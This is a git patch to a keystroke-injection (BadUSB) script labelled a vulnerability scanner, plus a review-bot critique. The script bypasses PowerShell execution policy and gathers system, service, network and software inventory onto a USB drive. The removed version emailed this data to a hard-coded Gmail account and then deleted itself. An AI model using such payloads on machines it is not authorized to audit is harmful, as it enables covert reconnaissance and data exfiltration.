From a92fd2b38a340a33019ee7bbcd7e2078f40f1fd3 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Mon, 20 May 2024 17:09:53 -0400
Subject: [PATCH] Update 3.0. VulnerabilityScanner

---
 3.0. VulnerabilityScanner | 714 ++++++++++++++++++++++++++------------
 1 file changed, 495 insertions(+), 219 deletions(-)

diff --git a/3.0. VulnerabilityScanner b/3.0. VulnerabilityScanner
index 8f2ab62..6868e64 100644
--- a/3.0. VulnerabilityScanner
+++ b/3.0. VulnerabilityScanner
@@ -1,4 +1,4 @@
-REM script in progress
+
 DELAY 1000
 REM Open Start Menu
 CONTROL ESCAPE
@@ -17,328 +17,604 @@
 DELAY 5000
 REM Set PowerShell Execution Policy to Bypass
 DELAY 1000
 STRING set-executionpolicy bypass -scope process -force
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
 REM Create the PowerShell script in memory and execute it
-DELAY 100
-STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force
-DELAY 100
+DELAY 400
+STRING $usbName = "MYUSB"
+DELAY 400
 ENTER
 DELAY 400
-STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword)
-DELAY 100
+STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
+DELAY 400
 ENTER
 DELAY 400
-STRING $script = {
-DELAY 100
+STRING if ($usbDrive) {
+DELAY 400
+ENTER
+DELAY 400
+STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
+DELAY 400
+ENTER
+DELAY 400
+STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
+DELAY 400
+ENTER
+DELAY 400
+STRING New-Item -ItemType Directory -Path $directoryPath
+DELAY 400
+ENTER
+DELAY 400
+STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
+DELAY 400
+ENTER
+DELAY 400
+STRING "" > $resultsFilePath
+DELAY 400
 ENTER
 DELAY 400
 STRING function check-passwordpolicy {
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
-STRING net accounts
-DELAY 100
+STRING try {
+DELAY 400
 ENTER
 DELAY 400
-STRING }
-DELAY 100
+STRING net accounts
+DELAY 400
 ENTER
 DELAY 400
-STRING function audit-services {
-DELAY 100
+STRING } catch {
+DELAY 400
 ENTER
 DELAY 400
-STRING get-service | select-object name, displayname, status, starttype
-DELAY 100
-ENTER
+STRING write-output "Error checking password policy: $_"
 DELAY 400
-STRING }
-DELAY 100
-ENTER
-DELAY 400
-STRING function check-networksettings {
-DELAY 100
-ENTER
-DELAY 400
-STRING get-netipconfiguration
-DELAY 100
-ENTER
-DELAY 400
-STRING }
-DELAY 100
-ENTER
-DELAY 400
-STRING function check-softwarevulnerabilities {
-DELAY 100
-ENTER
-DELAY 400
-STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
-DELAY 100
-ENTER
-DELAY 400
-STRING }
-DELAY 100
-ENTER
-DELAY 400
-STRING function check-cve {
-DELAY 100
-ENTER
-DELAY 400
-STRING param (
-DELAY 100
-ENTER
-DELAY 400
-STRING [string]$productname,
-DELAY 100
-ENTER
-DELAY 400
-STRING [string]$version
-DELAY 100
-ENTER
-DELAY 400
-STRING )
-DELAY 100
-ENTER
-DELAY 400
-STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
-DELAY 100
-ENTER
-DELAY 400
-STRING start-sleep -seconds 5
-DELAY 100
-ENTER
-DELAY 400
-STRING $response = invoke-restmethod -uri $uri -method get
-DELAY 100
-ENTER
-DELAY 400
-STRING if ($response.totalresults -gt 0) {
-DELAY 100
-ENTER
-DELAY 400
-STRING foreach ($cve in $response.result.cve_items) {
-DELAY 100
-ENTER
-DELAY 400
-STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
-DELAY 100
-ENTER
-DELAY 400
-STRING }
-DELAY 100
-ENTER
-DELAY 400
-STRING } else {
-DELAY 100
-ENTER
-DELAY 400
-STRING "no cves found for $productname $version"
-DELAY 100
 ENTER
 DELAY 400
 STRING }
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
 STRING }
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
-STRING function analyze-logs {
-DELAY 100
+STRING function audit-services {
+DELAY 400
 ENTER
 DELAY 400
-STRING get-eventlog -logname system -newest 100
-DELAY 100
+STRING try {
+DELAY 400
+ENTER
+DELAY 400
+STRING get-service | select-object name, displayname, status, starttype
+DELAY 400
+ENTER
+DELAY 400
+STRING } catch {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error auditing services: $_"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
 ENTER
 DELAY 400
 STRING }
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
-STRING function check-openports {
-DELAY 100
+STRING function check-networksettings {
+DELAY 400
 ENTER
 DELAY 400
-STRING netstat -an
-DELAY 100
+STRING try {
+DELAY 400
+ENTER
+DELAY 400
+STRING get-netipconfiguration
+DELAY 400
+ENTER
+DELAY 400
+STRING } catch {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error checking network settings: $_"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
 ENTER
 DELAY 400
 STRING }
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
-STRING function check-missingupdates {
-DELAY 100
+STRING function check-softwarevulnerabilities {
+DELAY 400
 ENTER
 DELAY 400
-STRING get-windowsupdatelog
-DELAY 100
+STRING try {
+DELAY 400
+ENTER
+DELAY 400
+STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
+DELAY 400
+ENTER
+DELAY 400
+STRING } catch {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error checking software vulnerabilities: $_"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
 ENTER
 DELAY 400
 STRING }
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
-STRING function check-firewallstatus {
-DELAY 100
-ENTER
+STRING function check-cve {
 DELAY 400
-STRING netsh advfirewall show allprofiles
-DELAY 100
-ENTER
-DELAY 400
-STRING }
-DELAY 100
-ENTER
-DELAY 400
-STRING function check-smbv1status {
-DELAY 100
-ENTER
-DELAY 400
-STRING get-windowsoptionalfeature -online -featurename smb1protocol
-DELAY 100
-ENTER
-DELAY 400
-STRING }
-DELAY 100
-ENTER
-DELAY 400
-STRING function check-antivirusstatus {
-DELAY 100
-ENTER
-DELAY 400
-STRING get-mpcomputerstatus
-DELAY 100
-ENTER
-DELAY 400
-STRING }
-DELAY 100
-ENTER
-DELAY 400
-STRING function send-emailandcleanup {
-DELAY 100
 ENTER
 DELAY 400
 STRING param (
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
-STRING [string]$smtpserver,
-DELAY 100
+STRING [string]$productname,
+DELAY 400
 ENTER
 DELAY 400
-STRING [string]$smtpfrom,
-DELAY 100
-ENTER
+STRING [string]$version
 DELAY 400
-STRING [string]$smtpto,
-DELAY 100
-ENTER
-DELAY 400
-STRING [string]$messagesubject,
-DELAY 100
-ENTER
-DELAY 400
-STRING [string]$messagebody,
-DELAY 100
-ENTER
-DELAY 400
-STRING [string]$attachmentpath,
-DELAY 100
-ENTER
-DELAY 400
-STRING [system.management.automation.pscredential]$credential
-DELAY 100
 ENTER
 DELAY 400
 STRING )
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
-STRING $smtp = new-object net.mail.smtpclient($smtpserver)
-DELAY 100
+STRING $initialDelay = 2
+DELAY 400
 ENTER
 DELAY 400
-STRING $smtp.credentials = $credential
-DELAY 100
+STRING try {
+DELAY 400
 ENTER
 DELAY 400
-STRING $smtp.enablessl = $true
-DELAY 100
+STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
+DELAY 400
 ENTER
 DELAY 400
-STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw))
-DELAY 100
+STRING start-sleep -seconds $initialDelay
+DELAY 400
 ENTER
 DELAY 400
-STRING remove-item -path $attachmentpath
-DELAY 100
+STRING $response = invoke-restmethod -uri $uri -method get
+DELAY 400
+ENTER
+DELAY 400
+STRING if ($response.totalresults -gt 0) {
+DELAY 400
+ENTER
+DELAY 400
+STRING foreach ($cve in $response.result.cve_items) {
+DELAY 400
+ENTER
+DELAY 400
+STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING } else {
+DELAY 400
+ENTER
+DELAY 400
+STRING "no cves found for $productname $version"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING } catch {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error checking CVEs: $_"
+DELAY 400
+ENTER
+DELAY 400
+STRING if ($_.Exception -match '403') {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
+DELAY 400
+ENTER
+DELAY 400
+STRING start-sleep -seconds 60
+DELAY 400
+ENTER
+DELAY 400
+STRING $retryResponse = invoke-restmethod -uri $uri -method get
+DELAY 400
+ENTER
+DELAY 400
+STRING if ($retryResponse.totalresults -gt 0) {
+DELAY 400
+ENTER
+DELAY 400
+STRING foreach ($cve in $retryResponse.result.cve_items) {
+DELAY 400
+ENTER
+DELAY 400
+STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING } else {
+DELAY 400
+ENTER
+DELAY 400
+STRING "no cves found for $productname $version"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
 ENTER
 DELAY 400
 STRING }
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
-STRING check-passwordpolicy > results.txt
-DELAY 100
+STRING function analyze-logs {
+DELAY 400
 ENTER
 DELAY 400
-STRING audit-services >> results.txt
-DELAY 100
+STRING try {
+DELAY 400
 ENTER
 DELAY 400
-STRING check-networksettings >> results.txt
-DELAY 100
+STRING get-eventlog -logname system -newest 100
+DELAY 400
 ENTER
 DELAY 400
-STRING check-softwarevulnerabilities >> results.txt
-DELAY 100
+STRING } catch {
+DELAY 400
 ENTER
 DELAY 400
-STRING analyze-logs >> results.txt
-DELAY 100
+STRING write-output "Error analyzing logs: $_"
+DELAY 400
 ENTER
 DELAY 400
-STRING check-openports >> results.txt
-DELAY 100
+STRING }
+DELAY 400
 ENTER
 DELAY 400
-STRING check-missingupdates >> results.txt
-DELAY 100
+STRING }
+DELAY 400
 ENTER
 DELAY 400
-STRING check-firewallstatus >> results.txt
-DELAY 100
+STRING function check-openports {
+DELAY 400
 ENTER
 DELAY 400
-STRING check-smbv1status >> results.txt
-DELAY 100
+STRING try {
+DELAY 400
 ENTER
 DELAY 400
-STRING check-antivirusstatus >> results.txt
-DELAY 100
+STRING netstat -an
+DELAY 400
 ENTER
 DELAY 400
-STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt
-DELAY 100
+STRING } catch {
+DELAY 400
 ENTER
 DELAY 400
-STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential
-DELAY 100
+STRING write-output "Error checking open ports: $_"
+DELAY 400
 ENTER
 DELAY 400
-STRING remove-item -path $myinvocation.mycommand.path
-DELAY 100
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING function check-missingupdates {
+DELAY 400
+ENTER
+DELAY 400
+STRING try {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Checking Windows Update logs..."
+DELAY 400
+ENTER
+DELAY 400
+STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
+DELAY 400
+ENTER
+DELAY 400
+STRING Get-WindowsUpdateLog -LogPath $updateLogPath
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "WindowsUpdate.log written to $updateLogPath"
+DELAY 400
+ENTER
+DELAY 400
+STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
+DELAY 400
+ENTER
+DELAY 400
+STRING } catch {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error getting Windows Update log: $_"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING function check-firewallstatus {
+DELAY 400
+ENTER
+DELAY 400
+STRING try {
+DELAY 400
+ENTER
+DELAY 400
+STRING netsh advfirewall show allprofiles
+DELAY 400
+ENTER
+DELAY 400
+STRING } catch {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error checking firewall status: $_"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING function check-smbv1status {
+DELAY 400
+ENTER
+DELAY 400
+STRING try {
+DELAY 400
+ENTER
+DELAY 400
+STRING get-windowsoptionalfeature -online -featurename smb1protocol
+DELAY 400
+ENTER
+DELAY 400
+STRING } catch {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error checking SMBv1 status: $_"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING function check-antivirusstatus {
+DELAY 400
+ENTER
+DELAY 400
+STRING try {
+DELAY 400
+ENTER
+DELAY 400
+STRING get-mpcomputerstatus
+DELAY 400
+ENTER
+DELAY 400
+STRING } catch {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error checking antivirus status: $_"
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING check-passwordpolicy >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING audit-services >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING check-networksettings >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING check-softwarevulnerabilities >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING analyze-logs >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING check-openports >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING check-missingupdates >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING check-firewallstatus >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING check-smbv1status >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING check-antivirusstatus >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+REM Dynamically identify critical software from running processes and scheduled tasks
+STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
+DELAY 400
+ENTER
+DELAY 400
+STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
+DELAY 400
+ENTER
+DELAY 400
+REM Combine running software and scheduled tasks
+STRING $softwareList = @()
+DELAY 400
+ENTER
+DELAY 400
+STRING foreach ($process in $runningSoftware) {
+DELAY 400
+ENTER
+DELAY 400
+STRING $softwareList += $process.Name
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING foreach ($task in $scheduledTasks) {
+DELAY 400
+ENTER
+DELAY 400
+STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+REM Remove duplicates and empty entries
+STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
+DELAY 400
+ENTER
+DELAY 400
+REM Check CVEs for identified software
+STRING foreach ($software in $softwareList) {
+DELAY 400
+ENTER
+DELAY 400
+STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
+DELAY 400
+ENTER
+DELAY 400
+STRING if ($version) {
+DELAY 400
+ENTER
+DELAY 400
+STRING check-cve -productname $software -version $version >> $resultsFilePath
+DELAY 400
+ENTER
+DELAY 400
+STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
+DELAY 400
+ENTER
+DELAY 400
+STRING start-sleep -seconds $initialDelay
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING }
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Results saved to USB drive."
+DELAY 400
+ENTER
+DELAY 400
+STRING } else {
+DELAY 400
+ENTER
+DELAY 400
+STRING write-output "Error: USB drive MYUSB not found."
+DELAY 400
 ENTER
 DELAY 400
 STRING }
-DELAY 100
+DELAY 400
 ENTER
 DELAY 400
 STRING invoke-command -scriptblock $script
-DELAY 100
+DELAY 400
 ENTER
 DELAY 20000
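Review bot: The final context line `STRING invoke-command -scriptblock $script` still runs, but this hunk deletes the `STRING $script = {` line that defined it, so the new side executes the `if ($usbDrive) { ... } else { ... }` block inline and then ends with a parameter-binding error on a null ScriptBlock; drop that `invoke-command` line (and its `DELAY`/`ENTER`) on the new side. In `check-cve`, `$initialDelay = 2` creates a function-local variable, so the `$initialDelay += (Get-Random -Minimum 5 -Maximum 10)` back-off in the caller's `foreach ($software in $softwareList)` never changes the delay before the request inside the function; if a growing delay per NVD request is the intent, remove the local assignment or read `$script:initialDelay` there instead. The `https://services.nvd.nist.gov/rest/json/cves/1.0` keyword endpoint is, as far as I know, retired in favour of the 2.0 API, which would send every lookup into the `catch` branch and make the `-match '403'` retry the common path rather than the exception — worth confirming before trusting an empty results file. `check-missingupdates` is the only place the script deletes anything, and it does so with `-Recurse -Force` on the hard-coded `"C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*"`; building that path from `$env:LOCALAPPDATA` avoids assuming the profile root and keeps the removal scoped to the folder `Get-WindowsUpdateLog` actually populates.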